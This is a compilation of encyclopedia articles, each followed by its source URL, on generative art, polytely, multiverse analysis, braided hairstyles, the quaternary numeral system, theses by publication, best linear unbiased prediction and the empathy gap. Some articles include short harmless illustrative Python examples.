In 2010,Michael Hansmeyergenerated architectural columns in a project called "Subdivided Columns – A New Order (2010)". The piece explored how the simple process of repeated subdivision can create elaborate architectural patterns. Rather than designing any columns directly, Hansmeyer designed a process that produced columns automatically. The process could be run again and again with different parameters to create endless permutations. Endless permutations could be considered a hallmark of generative design.[44]
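The idea of repeated subdivision can be sketched abstractly (a toy one-dimensional version, not Hansmeyer's actual process): each pass splits every segment at a chosen ratio, and varying the ratio produces different members of the same family of forms.

```python
# Toy sketch of generation by repeated subdivision (only loosely inspired by
# Hansmeyer's columns, whose actual process is far more elaborate): each step
# splits every (start, end) segment at a parameter-controlled ratio, so
# re-running with different parameters yields endless permutations of a form.

def subdivide(segments, ratio):
    """Split every (start, end) segment into two pieces at the given ratio."""
    out = []
    for start, end in segments:
        mid = start + (end - start) * ratio
        out.extend([(start, mid), (mid, end)])
    return out

def generate_profile(steps, ratio):
    """Repeatedly subdivide the unit interval, doubling the segment count each step."""
    segments = [(0.0, 1.0)]
    for _ in range(steps):
        segments = subdivide(segments, ratio)
    return segments
```

After `steps` passes the profile has `2**steps` segments; sweeping `ratio` over different values is the analogue of running the process "again and again with different parameters".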
Writers such as Tristan Tzara, Brion Gysin, and William Burroughs used the cut-up technique to introduce randomization to literature as a generative system. Jackson Mac Low produced computer-assisted poetry and used algorithms to generate texts; Philip M. Parker has written software to automatically generate entire books. Jason Nelson used generative methods with speech-to-text software to create a series of digital poems from movies, television and other audio sources.[45]
In the late 2010s, authors began to experiment with neural networks trained on large language datasets. David Jhave Johnston's ReRites is an early example of human-edited AI-generated poetry.
Generative systems may be modified while they operate, for example by using interactive programming environments such as Csound, SuperCollider, Fluxus and TidalCycles, including patching environments such as Max/MSP, Pure Data and vvvv. This is a standard approach to programming by artists, but may also be used to create live music and/or video by manipulating generative systems on stage, a performance practice that has become known as live coding. As with many examples of software art, because live coding emphasizes human authorship rather than autonomy, it may be considered in opposition to generative art.[46]
In 2020, Erick "Snowfro" Calderon launched the Art Blocks platform[47] for combining the ideas of generative art and the blockchain, with the resulting artworks created as NFTs on the Ethereum blockchain. One of the key innovations of generative art created in this way is that all the source code and the algorithm for creating the art have to be finalized and put on the blockchain permanently, without any ability to alter them further. The artwork is generated only when it is sold ("minted"); the result is random yet should reflect the overall aesthetic defined by the artist. Calderon argues that this process forces the artist to be very thoughtful about the algorithm behind the art:
Until today, a [generative] artist would create an algorithm, press the spacebar 100 times, pick five of the best ones and print them in high quality. Then they would frame them, and put them in a gallery. Maybe. Because Art Blocks forces the artist to accept every single output of the algorithm as their signed piece, the artist has to go back and tweak the algorithm until it's perfect. They can't just cherry-pick the good outputs. That elevates the level of algorithmic execution because the artist is creating something that they know they're proud of before they even know what's going to come out on the other side.[48]
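The mint-time generation pattern can be sketched as follows. This is an illustration of the general idea only, not Art Blocks' actual implementation: a fixed algorithm turns each mint's transaction hash into a deterministic set of artwork features.

```python
import hashlib
import random

# Sketch of seed-driven generative minting (illustrative, not Art Blocks'
# real code): the algorithm below is "finalized" and never changes; only the
# seed varies per mint, so each output is unpredictable in advance yet fully
# reproducible from its seed. The feature names are invented for the example.

def features_from_seed(seed_hex: str) -> dict:
    """Derive a deterministic set of artwork features from a mint seed."""
    seed = int(hashlib.sha256(seed_hex.encode()).hexdigest(), 16)
    rng = random.Random(seed)
    return {
        "palette": rng.choice(["mono", "pastel", "neon"]),
        "density": rng.randint(1, 100),
        "symmetry": rng.random() < 0.5,
    }
```

Because the mapping from seed to features is fixed, the artist must be satisfied with every point in the output space before minting begins, which is exactly the discipline Calderon describes.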
In 2003, Philip Galanter published the most widely cited theory of generative art, which describes generative art systems in the context of complexity theory.[17] In particular, the notion of Murray Gell-Mann and Seth Lloyd's effective complexity is cited. In this view both highly ordered and highly disordered generative art can be viewed as simple. Highly ordered generative art minimizes entropy and allows maximal data compression; highly disordered generative art maximizes entropy and disallows significant data compression. Maximally complex generative art blends order and disorder in a manner similar to biological life, and indeed biologically inspired methods are most frequently used to create complex generative art. This view is at odds with the earlier information-theory-influenced views of Max Bense[49] and Abraham Moles,[50] where complexity in art increases with disorder.
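This contrast can be illustrated with compressed size as a crude proxy for order (only suggestive, of course, not a measure of artistic complexity): a highly ordered pattern compresses to almost nothing, while a highly disordered one barely compresses at all.

```python
import random
import zlib

# Compressed size as a rough proxy for order (illustrative only): a highly
# ordered byte pattern compresses extremely well, while uniformly random
# bytes are essentially incompressible.

def compressed_size(data: bytes) -> int:
    return len(zlib.compress(data))

ordered = b"AB" * 5000                                        # maximal order
rng = random.Random(0)
disordered = bytes(rng.randrange(256) for _ in range(10000))  # maximal disorder
```

Running `compressed_size` on the two buffers shows the ordered pattern shrinking by orders of magnitude while the disordered one does not; on this reading, maximally complex material sits somewhere between the two extremes.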
Galanter notes further that, given the use of visual symmetry, pattern, and repetition by the most ancient known cultures, generative art is as old as art itself. He also addresses the mistaken equivalence by some that rule-based art is synonymous with generative art. For example, some art is based on constraint rules that disallow the use of certain colors or shapes. Such art is not generative because constraint rules are not constructive, i.e. by themselves they do not assert what is to be done, only what cannot be done.[51]
In their 2009 article, Margaret Boden and Ernest Edmonds agree that generative art need not be restricted to that done using computers, and that some rule-based art is not generative. They develop a technical vocabulary that includes Ele-art (electronic art), C-art (computer art), D-art (digital art), CA-art (computer-assisted art), G-art (generative art), CG-art (computer-based generative art), Evo-art (evolutionary art), R-art (robotic art), I-art (interactive art), CI-art (computer-based interactive art), and VR-art (virtual-reality art).[1]
The discourse around generative art can be characterized by the theoretical questions which motivate its development. McCormack et al. propose the following questions, shown with paraphrased summaries, as the most important:[52]
Another question concerns postmodernism: are generative art systems the ultimate expression of the postmodern condition, or do they point to a new synthesis based on a complexity-inspired world-view?[53]
|
https://en.wikipedia.org/wiki/Generative_art
|
Polytely (from Greek roots poly- and tel-, meaning "many goals") comprises complex problem-solving situations characterized by the presence of multiple simultaneous goals.[1] These goals may be contradictory or otherwise conflict with one another, requiring prioritisation of desired outcomes.[1]
Polytely is a feature of complex problem-solving that adds difficulty to finding an optimum solution. Funke describes polytely as a feature "not... inherent in a system, but [referring] to certain decisions of the experimenter", especially decisions relating to what goals are to be followed in solving the problem.[2] In the complex problem of nuclear waste disposal, Flüeler cites both trust between states (as a factor in nuclear proliferation: "Some states disarm whilst others re-arm – both do it for the sake of our planet's peace") and safe and sustainable disposal of nuclear waste as situations where thinking in terms of polytely helps elaborate and then balance important but conflicting goals.[3]
|
https://en.wikipedia.org/wiki/Polytely
|
Multiverse analysis is a scientific method that specifies and then runs a set of plausible alternative models or statistical tests for a single hypothesis.[1] It is a method to address the issue that the "scientific process confronts researchers with a multiplicity of seemingly minor, yet nontrivial, decision points, each of which may introduce variability in research outcomes",[2] a problem also known as researcher degrees of freedom[3] or as the garden of forking paths. It is a method arising in response to the credibility and replication crisis taking place in science, because it can diagnose the fragility or robustness of a study's findings. Multiverse analyses have been used in the fields of psychology[4] and neuroscience.[5] It is also a form of meta-analysis allowing researchers to provide evidence on how different model specifications impact results for the same hypothesis, and thus can point scientists toward where they might need better theory or causal models.
Multiverse analysis most often produces a large number of results that tend to go in all directions. This means that most studies do not offer consensus support or specific rejection of a hypothesis. Its strongest uses thus far are instead to provide evidence against conclusions based on findings from single studies, or to provide evidence about which model specifications are more or less likely to produce larger or more robust effect sizes.
Evidence against single studies or statistical models is useful in identifying potential false-positive results. For example, a now-infamous study concluded that hurricanes with female names are more deadly than hurricanes with male names.[6] In a follow-up study,[7] researchers ran thousands of models using the same hurricane data, but making various plausible adjustments to the regression model. By plotting a density curve of all regression coefficients, they showed that the coefficient of the original study was an extreme outlier.
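The follow-up study's approach can be sketched on synthetic data (the variables and the two analysis choices below are invented for illustration): the same hypothesis is estimated under every combination of plausible specification decisions, and the spread of the resulting coefficients indicates how robust the finding is.

```python
import itertools
import random

# Minimal multiverse analysis on synthetic data: one hypothesis ("x predicts
# y", true slope 0.5), estimated under every combination of two plausible
# analysis choices. All choices and variables are invented for illustration.

def ols_slope(xs, ys):
    """Slope of a simple least-squares fit of y on x."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    num = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    den = sum((x - mx) ** 2 for x in xs)
    return num / den

rng = random.Random(0)
data = []
for _ in range(200):
    x = rng.gauss(0, 1)
    data.append((x, 0.5 * x + rng.gauss(0, 1)))  # true slope is 0.5

def run_specification(rows, drop_extreme_y, restrict_x):
    if drop_extreme_y:                 # choice 1: drop the 5 largest |y| values
        rows = sorted(rows, key=lambda r: abs(r[1]))[:-5]
    if restrict_x:                     # choice 2: keep only moderate x values
        rows = [r for r in rows if abs(r[0]) < 2]
    xs, ys = zip(*rows)
    return ols_slope(xs, ys)

# One slope estimate per point in the "multiverse" of specifications.
multiverse = [run_specification(data, a, b)
              for a, b in itertools.product([False, True], repeat=2)]
```

A real analysis would involve dozens of choices (covariates, exclusions, transformations) and thousands of specifications; plotting the density of `multiverse` is the analogue of the coefficient curve used to flag the hurricane study's estimate as an outlier.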
In a study of birth-order effects,[8] researchers visualized a multiverse of plausible models using a specification curve, which allows researchers to visually inspect a plot of all model outcomes against various model specifications. They could show that their findings supported previous research on the effect of birth order on intellect, but provided evidence against an effect on life satisfaction and various personality traits.
|
https://en.wikipedia.org/wiki/Multiverse_analysis
|
Braids (also referred to as plaits) are a complex hairstyle formed by interlacing three or more strands of hair.[1] Braiding has never been specific to any one part of the world, ethnicity, hair type or culture, but has been used to style and ornament human and animal hair for thousands of years in various cultures around the world.[2]
The simplest and most common version is a flat, solid, three-stranded structure. More complex patterns can be constructed from an arbitrary number of strands to create a wider range of structures (such as a fishtail braid, a five-stranded braid, a rope braid, a French braid and a waterfall braid). The structure is usually long and narrow, with each component strand functionally equivalent in zigzagging forward through the overlapping mass of the others. Structurally, hair braiding can be compared with the process of weaving, which usually involves two separate perpendicular groups of strands (warp and weft).
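The three-strand structure can be made concrete by tracking strand positions as the outer strands alternately cross over the middle one (a purely illustrative model of the flat braid described above): after six crossings each strand has zigzagged through every position and returned to its starting place.

```python
# Toy model of a flat three-strand braid: crossings alternate between the
# (left, middle) pair and the (middle, right) pair, so every strand zigzags
# through all positions. Each crossing is recorded as a tuple of positions.

def braid_positions(strands, crossings):
    """Return the sequence of strand orders produced by alternating crossings."""
    order = list(strands)
    history = [tuple(order)]
    for step in range(crossings):
        i = 0 if step % 2 == 0 else 1        # which adjacent pair crosses
        order[i], order[i + 1] = order[i + 1], order[i]
        history.append(tuple(order))
    return history
```

For example, `braid_positions(["A", "B", "C"], 6)` returns to the starting order `("A", "B", "C")` on the final crossing, showing the period-six cycle of the basic braid.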
The oldest known reproduction of hair braiding may go back about 30,000 years in Europe: the Venus of Willendorf in Austria, now known in academia as the Woman of Willendorf, is a female figurine estimated to have been made between about 28,000 and 25,000 BCE.[3] It has been disputed whether she wears braided hair or some sort of woven basket on her head.
The Venus of Brassempouy in France is estimated to be about 25,000 years old and ostensibly shows a braided hairstyle.[4]
Another sample of a different origin was traced back to a burial site called Saqqara, located on the Nile River, during the first dynasty of Pharaoh Menes, although the Venuses of Brassempouy and Willendorf predate these examples by some 25,000–30,000 years.
During the Bronze Age, Iron Age and Greco-Roman era (a period spanning 3500 BC to 500 AD) many peoples in West Asia, Asia Minor, the Caucasus, Southeast Europe, the East Mediterranean, the Balkans and North Africa braided hair, beards and moustaches. In Mesopotamia, the practice was common among the Sumerians, Akkadians, Assyrians, Babylonians and Chaldeans, surviving among some Assyrians into the 18th century AD. In Ancient Iran the Elamites, Gutians, Lullubi, Kassites, Manneans, Persians, Medes and Parthians are depicted with braided hair and beards. Throughout Anatolia (Asia Minor), Hittites, Hattians, Hurrians, Mitanni, Luwians, Mycenaean Greeks, Urartians and Lydians are also depicted with these styles. In the Levant, braiding also appears among the Amorites, Eblaites, Arameans, Israelites, Phoenicians, Judeans, Moabites, Ugarites and Edomites, among others. Arabian Peninsula art depicts Dilmunites, Arabs, Maganites, Ubarites and Shebans in similar fashion. In North Africa the practice was common among Egyptians, Hyksos, Libyans and Berbers, and further south among Nubians and Axumites, as well as among Colchians, Armenians and Scythians of the Caucasus and Minoans, Etruscans, Greeks, Dacians and Pelasgians in Europe.[5][6] Bog bodies wearing braided hairstyles from the Northern European Iron Age have also been found in Northern Europe, and later still such braided styles were found among the Celts, Iberians, Germanic peoples, Slavs and Vikings in northern, western, eastern and southwestern Europe.[7][8]
In some regions, a braid was a means of communication. At a glance, one individual could distinguish a wealth of information about another, whether they were married, mourning, or of age for courtship, simply by observing their hairstyle. Braids were a means of social stratification. Certain hairstyles were distinctive to particular tribes or nations. Other styles informed others of an individual's status in society. African peoples such as the Himba people of Namibia and the Maasai people of Kenya have been braiding their hair for centuries. In many African tribes, hairstyles are unique and used to identify each tribe. Braid patterns or hairstyles can indicate a person's community, age, marital status, wealth, power, social position, and religion.[9]
On July 3, 2019, California became the first US state to prohibit discrimination over natural hair. Governor Gavin Newsom signed the CROWN Act into law, banning employers and schools from discriminating against hairstyles such as dreadlocks, braids, afros, and twists.[10] Later in 2019, Assembly Bill 07797 became law in New York state; it "prohibits race discrimination based on natural hair or hairstyles".[11]
Braiding is traditionally a social art. Because of the time it takes to braid hair, people have often taken time to socialize while braiding and having their hair braided. It begins with the elders making simple knots and braids for younger children. Older children watch and learn from them, start practicing on younger children, and eventually learn the traditional designs. This carries on a tradition of bonding between elders and the new generation.
There are a number of different types of braided hairstyles, including, commonly, French braids, cornrows, and box braids.[12] Braided hairstyles may also be used in combination with or as an alternative to simpler bindings, such as ponytails or pigtails. Braiding may also be used to add ornamentation, such as beads or hair extensions, as in crochet braiding.
European braids have been a cultural phenomenon for thousands of years. The Romans used braids to express status in both the Republic and the Empire.
Germanic cultures have also been known to have braids for centuries. The Stuttgart Psalter of 820 AD shows women with braided hair.
In India, braiding is common in both rural and urban areas. Girls are seen in twin braids, especially in schools, though now it is becoming less common. Young girls usually have one long braid. Married women have a bun or a braided bun.[citation needed]
Braids have been part of black culture going back generations. There are pictures going as far back as the year 1884 showing a Senegalese woman with braided hair in a similar fashion to how braids are worn today.[13]
Braids are normally done tighter in black culture than in others, such as incornrowsorbox braids. While this leads to the style staying in place for longer, it can also lead to initial discomfort. This is commonly accepted and managed through pain easing techniques. Some include pain killers, letting the braids hang low, and using leave-in-conditioner.[14]Alternative braiding techniques like knotless braids, which incorporate more of a person's natural hair and place less tension on the scalp, can cause less discomfort.[15]
Braids are not usually worn year-round in black culture; they are instead alternated with other popular hairstyles such as hair twists, protective hairstyles and more. Curly Mohawk, Half Updo and Side-Swept Cornrows are some of the popular and preferred braided styles in black culture.[16] As long as braids are done with a person's own hair, they can be considered part of the natural hair movement.
In India, many Hindu ascetics wear dreadlocks, known as Jatas.[17] Young girls and women in India often wear long braided hair at the back of their neck.[18] In the Upanishads, braided hair is mentioned as one of the primary charms of female seduction.[19] A significant tradition of braiding existed in Mongolia, where it was traditionally believed that the human soul resided in the hair. Hair was only unbraided when death was imminent.[20][21] In Japan, the Samurai sported a high-bound ponytail (chonmage), a hairstyle that is still common among Sumo wrestlers today. Japanese women wore various types of braids (三つ編み mitsuami) until the late 20th century because school regulations prohibited other hairstyles, leaving braids and the bob hairstyle as the main options for girls.[22] In China, girls traditionally had straight-cut bangs and also wore braids (辮子 biànzi). The Manchu men have historically braided their hair. After conquering Beijing in 1644 and establishing the Qing Dynasty, they forced the men of the subjugated Han Chinese to adopt this hairstyle as an expression of loyalty, which involved shaving the forehead and sides and leaving a long queue at the back (剃髮易服 tìfà yìfú). The Han Chinese considered this a humiliation, as they had never traditionally cut their hair due to Confucian customs. The last emperor, Puyi, cut off his queue in 1912, the same year China became a republic, marking the end of this male hairstyle in China.[23][24]
Braided hairstyles were widespread among many North American indigenous peoples, with traditions varying greatly from tribe to tribe. For example, among the Quapaw, young girls adorned themselves with spiral braids, while married women wore their hair loose.[25] Among the Lenape, women wore their hair very long and often braided it.[26][27] Among the Blackfoot, men wore braids, often on both sides behind the ear.[28] The men of the Kiowa tribe often wrapped pieces of fur around their braids, an ornament called a hair drop. Among the Lakota, both men and women wore their hair in two braids, with men's typically longer than women's; some had their braids wrapped in furs, typically bison, and other native groups of the Great Plains also wore hair drops. During times of war, warriors would often have their hair unbraided as a sign of fearlessness. Among the Maya, women had intricate hairstyles with two braids, while men had a single large braid that encircled the head.[29]
In Jamaica, the Rastafari movement, an Abrahamic faith practiced by descendants of African slaves, emerged in the 1930s; its adherents often wear dreadlocks and untrimmed beards, in adherence to the Old Testament prohibition on cutting hair.
Some fetishists find braids to be a strong erotic stimulus. Most commonly, the tightly woven French braid is mentioned in this context.
In the older psychiatric literature, there are occasional references to fetishists who, in order to possess the desired object, would cut off female braids. For example, Swiss psychiatrist Auguste Forel described the case of a braid-cutter in Berlin in 1906, who was found in possession of 31 braids.[30] Richard von Krafft-Ebing had already explored a deeper understanding of hair fetishism in the late 19th century.[31]
In psychoanalytic literary interpretation, authors have continued to explore braid-cutters to this day. Notably, an episode in Ernest Hemingway's novel For Whom the Bell Tolls has aroused considerable interest.[32][33] Sigmund Freud had interpreted hair-cutting as a symbolic castration in Totem and Taboo (1913).[34] Some authors later followed him in seeing the braid as a phallic symbol.[35][36][37] Others interpreted braids as a symbol of virginity and the unbraiding or cutting of the braid as a symbol of defloration.[38]
Braiding is also used to prepare horses' manes and tails for showing, such as in polo and polocrosse.[39]
https://en.wikipedia.org/wiki/Braid_(hairstyle)
Quaternary /kwəˈtɜːrnəri/ is a numeral system with four as its base. It uses the digits 0, 1, 2, and 3 to represent any real number. Conversion from binary is straightforward.
Four is the largest number within the subitizing range and one of two numbers that is both a square and a highly composite number (the other being thirty-six), making quaternary a convenient choice for a base at this scale. Despite being twice as large, its radix economy is equal to that of binary. However, it fares no better in the localization of prime numbers (the smallest better base being the primorial base six, senary).
Quaternary shares with all fixed-radix numeral systems many properties, such as the ability to represent any real number with a canonical representation (almost unique) and the characteristics of the representations of rational numbers and irrational numbers. See decimal and binary for a discussion of these properties.
As with the octal and hexadecimal numeral systems, quaternary has a special relation to the binary numeral system. Each radix four, eight, and sixteen is a power of two, so the conversion to and from binary is implemented by matching each digit with two, three, or four binary digits, or bits. For example, the quaternary number 230210 corresponds to the binary number 101100100100, with each quaternary digit matching one pair of bits: 10 11 00 10 01 00.
Since sixteen is a power of four, conversion between these bases can be implemented by matching each hexadecimal digit with two quaternary digits. For example, the hexadecimal number B24 corresponds to the quaternary number 230210, since B = 23, 2 = 02, and 4 = 10 in quaternary.
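The digit-grouping conversions described above can be sketched in a few lines of code (the helper names are illustrative, not standard library functions):

```python
# Convert between binary, quaternary, and hexadecimal by digit grouping.

def binary_to_quaternary(bits: str) -> str:
    """Map each pair of bits (from the left, after padding) to one quaternary digit."""
    bits = bits.zfill((len(bits) + 1) // 2 * 2)  # pad to an even length
    return "".join(str(int(bits[i:i + 2], 2)) for i in range(0, len(bits), 2))

def hex_to_quaternary(hex_digits: str) -> str:
    """Map each hexadecimal digit to a pair of quaternary digits."""
    return "".join(str(int(d, 16) // 4) + str(int(d, 16) % 4)
                   for d in hex_digits)

print(binary_to_quaternary("101100100100"))  # → 230210
print(hex_to_quaternary("B24"))              # → 230210
```

Both routes reach the same quaternary string because each hexadecimal digit is exactly two quaternary digits, and each quaternary digit is exactly two bits.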
Although octal and hexadecimal are widely used in computing and computer programming in the discussion and analysis of binary arithmetic and logic, quaternary does not enjoy the same status.
Although quaternary has limited practical use, it can be helpful if it is ever necessary to perform hexadecimal arithmetic without a calculator. Each hexadecimal digit can be turned into a pair of quaternary digits. Then, arithmetic can be performed relatively easily before converting the end result back to hexadecimal. Quaternary is convenient for this purpose, since numbers have only half the digit length compared to binary, while still having very simple multiplication and addition tables with only three unique non-trivial elements.
By analogy with byte and nybble, a quaternary digit is sometimes called a crumb.
Due to having only factors of two, many quaternary fractions have repeating digits, although these tend to be fairly simple:
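As a small illustration (the helper below is a sketch, not standard library code), base-4 long division shows that 1/2 terminates while 1/3 and 1/5 repeat with short periods:

```python
def quaternary_fraction(num: int, den: int, ndigits: int = 8) -> str:
    """Long division in base 4: expand num/den (with 0 < num < den) digit by digit."""
    digits = []
    rem = num
    for _ in range(ndigits):
        rem *= 4
        digits.append(str(rem // den))
        rem %= den
    return "0." + "".join(digits)

print(quaternary_fraction(1, 2))  # → 0.20000000 (terminates: 2 divides the base)
print(quaternary_fraction(1, 3))  # → 0.11111111 (repeating 1)
print(quaternary_fraction(1, 5))  # → 0.03030303 (repeating 03)
```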
Many or all of the Chumashan languages (spoken by the Native American Chumash peoples) originally used a quaternary numeral system, in which the names for numbers were structured according to multiples of four and sixteen, instead of ten. There is a surviving list of Ventureño language number words up to thirty-two, written down by a Spanish priest ca. 1819.[1]
The Kharosthi numerals (from the languages of the tribes of Pakistan and Afghanistan) have a partial quaternary numeral system from one to ten.
Quaternary numbers are used in the representation of 2D Hilbert curves. Here, a real number between 0 and 1 is converted into the quaternary system. Every single digit then indicates in which of the respective four sub-quadrants the number will be projected.
Parallels can be drawn between quaternary numerals and the way genetic code is represented by DNA. The four DNA nucleotides in alphabetical order, abbreviated A, C, G, and T, can be taken to represent the quaternary digits in numerical order 0, 1, 2, and 3. With this encoding, the complementary digit pairs 0↔3 and 1↔2 (binary 00↔11 and 01↔10) match the complementation of the base pairs A↔T and C↔G, and can be stored as data in DNA sequence.[2] For example, the nucleotide sequence GATTACA can be represented by the quaternary number 2033010 (= decimal 9156 or binary 10 00 11 11 00 01 00). The human genome is 3.2 billion base pairs in length.[3]
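The GATTACA example above can be checked with a short sketch (the mapping follows the encoding in the text; the function name is illustrative):

```python
# Encode a DNA string as quaternary digits: A→0, C→1, G→2, T→3.
ENCODE = {"A": "0", "C": "1", "G": "2", "T": "3"}

def dna_to_quaternary(seq: str) -> str:
    return "".join(ENCODE[base] for base in seq)

q = dna_to_quaternary("GATTACA")
print(q)          # → 2033010
print(int(q, 4))  # → 9156 (the decimal value quoted above)

# The base-pair complement A↔T, C↔G corresponds to the digit pairing d ↔ 3 − d.
complement = "".join(str(3 - int(d)) for d in q)
print(complement)  # → 1300323, i.e. the complement strand CTAATGT
```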
Quaternary line codes have been used for transmission, from the invention of the telegraph to the 2B1Q code used in modern ISDN circuits.
The GDDR6X standard, developed by Nvidia and Micron, uses quaternary bits to transmit data.[4]
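The general idea of such signaling (a generic two-bits-per-symbol illustration, not the actual GDDR6X protocol) is that each byte is carried by four quaternary symbols instead of eight binary ones:

```python
# Toy sketch: split a byte into four quaternary symbols (values 0–3),
# so each transmitted symbol carries two bits, and reassemble it.

def byte_to_symbols(b: int) -> list[int]:
    return [(b >> shift) & 0b11 for shift in (6, 4, 2, 0)]

def symbols_to_byte(symbols: list[int]) -> int:
    value = 0
    for s in symbols:
        value = (value << 2) | s
    return value

print(byte_to_symbols(0xB2))                      # → [2, 3, 0, 2]
print(symbols_to_byte([2, 3, 0, 2]) == 0xB2)      # → True
```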
Some computers have used quaternary floating point arithmetic, including the Illinois ILLIAC II (1962)[5] and the Digital Field System DFS IV and DFS V high-resolution site survey systems.[6]
https://en.wikipedia.org/wiki/Base4
A thesis as a collection of articles[1] or series of papers,[2] also known as a thesis by published works[1] or article thesis,[3] is a doctoral dissertation that, as opposed to a coherent monograph, is a collection of research papers with an introductory section consisting of summary chapters. Other, less used terms are "sandwich thesis" and "stapler thesis". It is composed of already-published journal articles, conference papers and book chapters, and, occasionally, not-yet-published manuscripts. A thesis by publication is a form of compilation thesis (a term used in Nordic countries). Another form of compilation thesis is the essay thesis, which is composed of previously unpublished independent essays.[3]
Today, article theses are the standard format in the natural, medical, and engineering sciences (e.g., in the Nordic countries), while in the social and cultural sciences there is a strong but decreasing tradition of producing coherent monographs, i.e., theses written as a series of linked chapters. In other cases, doctoral students may have a choice between writing a monograph or a compilation thesis.[4][5]
The thesis by published works format is chosen in cases where the student intends to first publish the thesis in parts in international journals. It often results in a higher number of publications during doctoral studies than a monograph, and may result in a higher number of citations in other research publications – something that may be advantageous from a research funding point of view and may facilitate a readership appointment after the dissertation.[clarification needed] A further reason for writing a compilation thesis is that some of the articles can be written together with other authors, which may be especially helpful for new doctoral students. A majority of the articles should be reviewed by referees outside of the student's own department, supplementing the audit carried out by the supervisory staff and the dissertation opponent, thus assuring international standards.[4]
The introductory or summary chapters of a thesis by published works should be written independently by the student. They should include an extensive annotated bibliography or literature review, placing the scope and results of the articles in the wider context of the current state of international research. They constitute a comprehensive summary of the appended papers, and should clarify the contribution of the doctoral student if the papers are written by several authors. They should not provide new results, but may synthesize new conclusions by combining results from several of the papers. They may supplement the articles with a motivation of the chosen scope, research problems, objectives and methods, and a strengthening of the theoretical framework, analysis and conclusions, since the length of the articles normally does not allow these kinds of longer discussions.[3][6][7]
https://en.wikipedia.org/wiki/Collection_of_articles
In statistics, best linear unbiased prediction (BLUP) is used in linear mixed models for the estimation of random effects. BLUP was derived by Charles Roy Henderson in 1950, but the term "best linear unbiased predictor" (or "prediction") seems not to have been used until 1962.[1] "Best linear unbiased predictions" (BLUPs) of random effects are similar to best linear unbiased estimates (BLUEs) (see Gauss–Markov theorem) of fixed effects. The distinction arises because it is conventional to talk about estimating fixed effects but about predicting random effects, but the two terms are otherwise equivalent. (This is a bit strange since the random effects have already been "realized"; they already exist. The use of the term "prediction" may be because in the field of animal breeding in which Henderson worked, the random effects were usually genetic merit, which could be used to predict the quality of offspring (Robinson[1] page 28).) However, the equations for the "fixed" effects and for the random effects are different.
In practice, it is often the case that the parameters associated with the random effect(s) term(s) are unknown; these parameters are the variances of the random effects and residuals. Typically the parameters are estimated and plugged into the predictor, leading to the empirical best linear unbiased predictor (EBLUP). Notice that by simply plugging the estimated parameters into the predictor, additional variability is unaccounted for, leading to overly optimistic prediction variances for the EBLUP.[citation needed]
Best linear unbiased predictions are similar to empirical Bayes estimates of random effects in linear mixed models, except that in the latter case, where the weights depend on unknown values of components of variance, these unknown variances are replaced by sample-based estimates.
Suppose that the model for observations {Yj; j = 1, ..., n} is written as

Yj = μ + β′xj + ξj + εj,

where μ is the mean of all observations Y, and ξj and εj represent the random effect and observation error for observation j, and suppose they are uncorrelated and have known variances σξ² and σε², respectively. Further, xj is a vector of independent variables for the jth observation and β is a vector of regression parameters.
The BLUP problem of providing an estimate of the observation-error-free value for the kth observation,

Ỹk = μ + β′xk + ξk,

can be formulated as requiring that the coefficients of a linear predictor, defined as

Ŷk = Σj cj Yj,

should be chosen so as to minimise the variance of the prediction error,

Var(Ŷk − Ỹk),

subject to the condition that the predictor is unbiased,

E(Ŷk − Ỹk) = 0.
In contrast to the case of best linear unbiased estimation, the "quantity to be estimated", Ỹk, not only has a contribution from a random element, but one of the observed quantities, specifically Yk, which contributes to Ŷk, also has a contribution from this same random element.
In contrast to BLUE, BLUP takes into account known or estimated variances.[2]
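As a minimal numerical sketch (assuming, for illustration, a model with no regression term and known mean and variances), the BLUP of the random effect ξk shrinks the residual Yk − μ by the factor σξ²/(σξ² + σε²), and this shrunken predictor has smaller mean squared error than the raw residual:

```python
import random

random.seed(0)
mu, var_xi, var_eps = 10.0, 4.0, 1.0
shrink = var_xi / (var_xi + var_eps)  # BLUP shrinkage factor

# Simulate many observations Y = mu + xi + eps with known variances.
n = 100_000
xi = [random.gauss(0.0, var_xi ** 0.5) for _ in range(n)]
y = [mu + x + random.gauss(0.0, var_eps ** 0.5) for x in xi]

# Predict each realized random effect two ways and compare mean squared error.
mse_raw = sum((yj - mu - xj) ** 2 for yj, xj in zip(y, xi)) / n
mse_blup = sum((shrink * (yj - mu) - xj) ** 2 for yj, xj in zip(y, xi)) / n

print(round(mse_raw, 2), round(mse_blup, 2))  # raw ≈ 1.0, BLUP ≈ 0.8
```

The theoretical errors are σε² = 1.0 for the raw residual and σξ²σε²/(σξ² + σε²) = 0.8 for the BLUP, which the simulation approximates.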
Henderson explored breeding from a statistical point of view. His work assisted the development of the selection index (SI) and estimated breeding value (EBV). These statistical methods influenced the artificial insemination stud rankings used in the United States. These early statistical methods are sometimes confused with the BLUP now common in livestock breeding.
The actual term BLUP originated out of work at the University of Guelph in Canada by Daniel Sorensen and Brian Kennedy, in which they extended Henderson's results to a model that includes several cycles of selection.[3] This model was popularized by the University of Guelph in the dairy industry under the name BLUP. Further work by the University showed BLUP's superiority over EBV and SI, leading to it becoming the primary genetic predictor.[citation needed]
There is thus some confusion between the BLUP model popularized above and the best linear unbiased prediction statistical method, which was considered too theoretical for general use. The model was supplied to farmers for use on computers.
In Canada, all dairies report nationally. The genetics in Canada were shared, making it the largest genetic pool and thus a source of improvements. This, together with BLUP, drove a rapid increase in Holstein cattle quality.
https://en.wikipedia.org/wiki/Best_linear_unbiased_prediction
An empathy gap, sometimes referred to as an empathy bias, is a breakdown or reduction in empathy (the ability to recognize, understand, and share another's thoughts and feelings) where it might otherwise be expected to occur. Empathy gaps may occur due to a failure in the process of empathizing[1] or as a consequence of stable personality characteristics,[2][3][4] and may reflect either a lack of ability or motivation to empathize.
Empathy gaps can be interpersonal (toward others) or intrapersonal (toward the self, e.g. when predicting one's own future preferences). A great deal of social psychological research has focused on intergroup empathy gaps, their underlying psychological and neural mechanisms, and their implications for downstream behavior (e.g. prejudice toward outgroup members).
Failures in cognitive empathy (also referred to as perspective-taking) may sometimes result from a lack of ability. For example, young children often engage in failures of perspective-taking (e.g., on false belief tasks) due to underdeveloped social cognitive abilities.[5] Neurodivergent individuals often face difficulties inferring others' emotional and cognitive states, though the double empathy problem proposes that the problem is mutual, occurring as well in non-neurodivergent individuals' struggle to understand and relate to neurodivergent people.[6] Failures in cognitive empathy may also result from cognitive biases that impair one's ability to understand another's perspective (for example, see the related concept of naive realism).[7]
